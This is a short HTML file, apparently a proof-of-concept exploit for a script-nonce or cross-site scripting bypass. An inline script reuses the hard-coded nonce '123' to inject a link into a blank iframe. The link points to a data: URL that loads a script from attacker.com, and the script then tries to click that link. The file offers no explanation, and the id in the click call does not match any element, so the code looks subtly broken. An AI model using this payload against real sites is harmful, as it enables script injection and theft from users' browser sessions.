<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGMXTfdGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGMXTfdGGGGG.onload=_=>GGGGGMXTfdGGGGG.contentDocument.body.innerHTML+="<a id=a1 href='data:text/html,<script src=https://attacker.com/static/static.js nonce=123><\\/script>'>click<\/a><script nonce=123>GGGGMXTfdGGGG.click();<\/script>";GGGGGMXTfdGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>